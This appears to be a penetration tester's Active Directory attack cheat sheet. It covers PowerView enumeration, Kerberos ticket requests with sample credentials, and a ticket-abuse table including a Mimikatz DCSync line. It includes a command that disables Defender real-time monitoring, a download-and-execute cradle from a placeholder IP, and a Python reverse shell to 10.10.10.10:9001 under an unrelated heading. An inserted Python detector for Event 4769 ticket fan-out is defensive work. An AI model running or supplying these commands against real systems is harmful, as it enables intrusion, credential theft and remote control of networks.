INFRASTRUCTURE
ACTIVE DIRECTORY
DOMAIN ENUMERATION
I do prefer to do manual enumeration, but on large enterprise networks some automated scan would come in handy to search for low-hanging fruit.
Automated scanners: adPEAS.ps1
You can as well use BloodHound to visualize the data.
Checklist: check the password policy, gather usernames, pray and spray with CME.
#For SharpHound.exe
./SharpHound.exe --CollectionMethod All
#For SharpHound.ps1
Invoke-BloodHound -ZipFileName ratloot -CollectionMethod All -Domain rat.local
Getting hands dirty with PowerView
# Patch AMSI or disable AV
Set-MpPreference -DisableRealTimeMonitoring -DisableAVIOProtection $true
iex(New-Object System.Net.WebClient).downloadString('http:/x.x.x.x./PowerView_DeV.ps1')
# Domain & Controller Enumeration
Get-NetDomain
Get-NetDomainController
# User Enumeration
# Get all users present in the domain
Get-NetUsers | select cn
# Get users sorted with most logoncounts
Get-UserProperty -Properties logoncount | where logoncount | sort logoncount -Descending
# Get all the users in the domain and pipe their username to build a wordlist that could be used with crackmapexec later for spraying
Get-NetUsers | select samaccountname > username.txt
# Group Enumeration
# Get AD groups data either all or of a user
Get-NetGroup [-Domain <target>] [-FullData] [-GroupName "*admin*"] [-Username 'user_name']
# Get Members of a group
Get-NetGroupMember [-GroupName 'group_name'] [-Recurse]
# Share Enumeration
# Find interesting shares
Invoke-ShareFinder -ExcludeStandard -ExcludeIPC -ExcludePrint
# GPO Enumeration
# List all GPOs in the domain
Get-NetGPO [-ComputerName <rat.domain>]
#Find Interesting GPO
Get-NetGPOGroup
# OU Enumeration
# Get all OU (Organisational Units) in the domain
Get-NetOU [-FullData]
# Get gplink of an OU to get GPOs applied to it
(Get-NetOU -Name 'test').gplink
# Get GPO of a GPlink
Get-NetGPO -GPOName '{cadkfapsdfasdfaudvajkd}'
# Get GPO of an OU using gplink
((Get-NetOU -FullData <OU_NAME>).gplink -split "cn=" -split ",")[1] | Get-NetGPO
# ACL Enumeration
# Find interesting ACL
Invoke-ACLScanner -ResolveGUIDS
# Find interesting ACL owned by a certain user :rat:
Invoke-ACLScanner -ResolveGUIDS | ?{$_.IdentityReference -match 'rat'}
# Trust Enumeration
# Map all domain trust
Get-NetDomainTrust [-Domain <target>]
# Get all the domain of a forest
Get-NetForestDomain [-Forest <target>]
# Hunting Users and Sessions
# Get list of all machines where current user has local admin access
Find-LocalAdminAccess
# Find all admins on all computers
Invoke-EnumerateLocalAdmin
# Find machines where a domain admin has a session; -CheckAccess also tells you whether you have access to that machine
Invoke-UserHunter [-GroupName <group_name>] [-CheckAccess]
# Get list of active sessions on a computer
Get-NetSession [-ComputerName <comp_name>]
# Get list of Users logged-on on a system
Get-LoggedOnLocal [-ComputerName <comp_name>]
Kerberos Attacks
# working from linux with creds
# username : rat
# password : r@tty419
# domain : rodent.local
impacket-getTGT rodent.local/rat:'r@tty419'
# now import the ticket into memory
export KRB5CCNAME=/tmp/rat.ccache
# confirm the ticket in memory
klist
# working from windows with creds
# Using Rubeus
./Rubeus.exe asktgt
With /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm, Rubeus can ask for tickets for all of these service classes in one go.
| Service Ticket | Service Type | Abuse function |
|---|---|---|
| CIFS | Windows file share, PsExec | |
| HOST | PsRemoting, scheduled tasks | |
| HTTP | PsRemoting | $sess = New-PsSession -Computername DC01; Enter-PsSession -Session $sess |
| LDAP | LDAP ops, DCSync | Mimikatz > lsadump::dcsync /rat.local:$DC-IP /all /csv |
| RPCSS | | |
| KRBTGT | Golden Ticket | do anything lol |
| HOST & RPCSS | WMI | WMIEXEC |
| HOST & HTTP | WinRM | WMIEXEC |
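The defender's view of that /altservice list: one account pulling service tickets for many SPN classes on the same host within seconds, which stands out in Kerberos service ticket request events (Event ID 4769). This is an added example, not part of the original notes; the 4769 lines are constructed and simplified, and the threshold and window are assumptions.

```python
# Added example: flag one account requesting tickets for many distinct
# service classes on one host inside a short window (the /altservice pattern).
# The log lines below are constructed, simplified 4769 records, not real data.
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample: "<time> 4769 account=<user> spn=<class>/<host>"
SAMPLE_4769 = """\
2024-05-01T09:00:01 4769 account=rat@RODENT.LOCAL spn=cifs/dc01.rodent.local
2024-05-01T09:00:02 4769 account=rat@RODENT.LOCAL spn=host/dc01.rodent.local
2024-05-01T09:00:02 4769 account=rat@RODENT.LOCAL spn=http/dc01.rodent.local
2024-05-01T09:00:03 4769 account=rat@RODENT.LOCAL spn=ldap/dc01.rodent.local
2024-05-01T09:00:03 4769 account=rat@RODENT.LOCAL spn=rpcss/dc01.rodent.local
2024-05-01T09:00:04 4769 account=rat@RODENT.LOCAL spn=wsman/dc01.rodent.local
2024-05-01T09:05:00 4769 account=alice@RODENT.LOCAL spn=cifs/fs01.rodent.local
2024-05-01T09:07:00 4769 account=alice@RODENT.LOCAL spn=http/fs01.rodent.local
2024-05-01T11:00:00 4769 account=alice@RODENT.LOCAL spn=ldap/dc01.rodent.local
"""

LINE_RE = re.compile(r"^(\S+) 4769 account=(\S+) spn=([^/\s]+)/(\S+)$")

def parse_4769(text):
    """Yield (time, account, service_class, host) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.fromisoformat(m.group(1))
            yield ts, m.group(2).lower(), m.group(3).lower(), m.group(4).lower()

def find_service_fanout(text, min_classes=4, window=timedelta(minutes=2)):
    """Return {(account, host): sorted service classes} for every pair where
    >= min_classes distinct classes were requested inside one sliding window."""
    per_pair = defaultdict(list)
    for ts, acct, svc, host in parse_4769(text):
        per_pair[(acct, host)].append((ts, svc))
    hits = {}
    for key, events in per_pair.items():
        events.sort()  # sliding window over time-ordered requests
        for i, (start, _) in enumerate(events):
            classes = {svc for ts, svc in events[i:] if ts - start <= window}
            if len(classes) >= min_classes:
                hits[key] = sorted(classes)
                break
    return hits

if __name__ == "__main__":
    for (acct, host), classes in find_service_fanout(SAMPLE_4769).items():
        print(f"{acct} -> {host}: {classes}")
```

Normal users touching two or three classes on a file server (as alice does here) stay below the threshold; tune min_classes and window against your own baseline.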
RTF && SCF Weaponization
MITM6 IPV6 Attack
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'